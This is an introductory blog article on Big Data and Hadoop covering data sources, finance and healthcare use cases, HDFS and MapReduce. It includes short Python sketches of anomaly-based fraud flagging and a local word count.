Big Data and Hadoop: Present


Data is valuable. Insight from Big Data can provide useful information and make business decisions more effective. It can be used for predictive analysis, hypothetical modelling, weather forecasting and quick decision-making. Big Data refers to large and complex datasets in which much of the data is in unstructured or semi-structured format and does not yield readable information in a straightforward way. It can be analysed to reveal patterns, trends and associations, especially those related to human behaviour and interactions.

Who is generating Big Data?

Big Data comes from various sources in unstructured, semi-structured and structured forms. Some of these sources are shown in the figure:

Sources of Big Data


In social networking and media, we have Facebook, Twitter, LinkedIn, blogs, site comments, images, videos and so on. Mobile devices generate audio data from users' calls, semi-structured data from messaging, and location data from navigation applications that track the user's every step. Internet transactions such as purchases, banking and investment activities produce large datasets. Internet-connected hardware, sensors (temperature, humidity, pressure) and beacon interactions also generate Big Data.

The graph shows the growth of global data.

Growth of Global Data


Below are a few use cases that illustrate how Big Data and Hadoop are being integrated in the financial services and healthcare industries, providing companies with insights into their operations, their customers and their markets:

  1. Data-driven Healthcare Organizations use Big Data Analytics for Big Gain

    Rising costs, chronic illness, an aging population and a shortage of professionals are forcing change in the healthcare industry. To gain insight into how they can provide better services to their customers while reducing costs, healthcare providers are turning to Big Data analytics. Leading organizations are treating data as a strategic asset and putting processes in place to derive solutions from data rather than relying only on what healthcare professionals provide.

  2. Fraud Detection

    Predictive analysis is used in fraud detection: flagging anomalous activity in real time can help prevent potential security attacks or fraud. The combination of Big Data and Hadoop gives banks the ability to build usage models based on the historic behaviour of customers, analyse incoming transactions against individual and aggregate data with predictive analysis, and take appropriate action if the activity falls outside the confidence level of normal behaviour. As more data accumulates, a more precise model can be built, so the system can more accurately separate abnormal behaviour from normal situations.

  3. New Products and Services for Consumer Credit Card Holders

    Making new products and services available to consumer card holders is an ongoing initiative for banks, which analyse customer behaviour on websites to learn what customers want. Insight from big data improves marketing campaigns and ads through effective targeting. This is required in order to deliver services to consumers and increase revenue for banks.

    Vendors that provide support and services for big data give credit card companies the ability to use machine learning techniques for multiple purposes, including fraud detection and recommendations. Advanced machine learning and statistical techniques are applied to data stored in a Hadoop cluster.

  4. Credit Risk Assessment

    Due to the global financial crisis, there are now much more stringent rules for determining whether or not to give a customer a loan, so banks need more accurate ways to determine a person’s credit risk. Hadoop enables banks to pull in customer data on everything from deposit information to customer service emails to credit card purchase history in order to gain a holistic view of their customers.
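
The fraud detection use case above, where a usage model is built from a customer's history and incoming transactions are checked against it, can be illustrated with a very small sketch. This is not how any particular bank or Hadoop product implements it; it assumes the simplest possible model (mean and standard deviation of past amounts) and a hypothetical threshold of three standard deviations. The function names and sample amounts are invented for illustration.

```python
from statistics import mean, stdev


def build_usage_model(history):
    """Summarise past transaction amounts as (mean, standard deviation)."""
    return mean(history), stdev(history)


def is_anomalous(amount, model, z_threshold=3.0):
    """Flag an amount that lies more than z_threshold std devs from the mean.

    z_threshold is an assumed cut-off, not a value taken from the article.
    """
    mu, sigma = model
    if sigma == 0:
        # No variation in the history: anything different is unusual.
        return amount != mu
    return abs(amount - mu) / sigma > z_threshold


# Hypothetical purchase history for one customer.
history = [42.0, 38.5, 51.0, 45.2, 39.9, 47.3, 44.1, 40.8]
model = build_usage_model(history)

# Check two incoming transactions against the model.
flags = {amount: is_anomalous(amount, model) for amount in (46.0, 400.0)}
for amount, flagged in flags.items():
    print(amount, "flagged" if flagged else "ok")
```

As more history accumulates, the mean and standard deviation become more stable, which is the sense in which a more precise model separates abnormal from normal behaviour. A production system would typically use richer features and aggregate data across customers.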

The figure below shows Big Data in the Hadoop ecosystem. To process Big Data in Hadoop, the first step is to load the data into HDFS; we then write Hadoop Mapper and Reducer functions to analyse the data stored in HDFS. The output is the extracted patterns or other useful information.

Big Data in Hadoop Ecosystem
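
To make the Mapper and Reducer steps more concrete, here is a minimal sketch of the map, shuffle and reduce phases as a word count. It runs locally in plain Python and only imitates the flow; it does not use HDFS or the Hadoop API, and the function names and sample lines are assumptions made for illustration. In a real job the input lines would be read from files in HDFS and the framework would perform the shuffle.

```python
from collections import defaultdict


def mapper(line):
    """Map phase: emit a (word, 1) pair for every word in one input line."""
    for word in line.lower().split():
        yield word, 1


def shuffle(pairs):
    """Shuffle phase: group all emitted values by key."""
    grouped = defaultdict(list)
    for key, value in pairs:
        grouped[key].append(value)
    return grouped


def reducer(key, values):
    """Reduce phase: combine all values for one key into a single result."""
    return key, sum(values)


def run_job(lines):
    """Run map, shuffle and reduce over an iterable of text lines."""
    mapped = (pair for line in lines for pair in mapper(line))
    grouped = shuffle(mapped)
    return dict(reducer(key, values) for key, values in sorted(grouped.items()))


# Stand-in for lines that would normally be read from HDFS.
sample_lines = [
    "big data needs hadoop",
    "hadoop stores big data in hdfs",
]
word_counts = run_job(sample_lines)
print(word_counts)
```

The same split applies to other analyses: the mapper decides what key each record contributes to, and the reducer decides how the values for one key are summarised.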



Author

Prabhat Jain spends most of his time researching how to analyze unstructured data with the Hadoop framework. He also focuses on emerging tools and technologies that deal with big data. He likes coding and blogging, and also loves to eat junk food and listen to EDM songs.
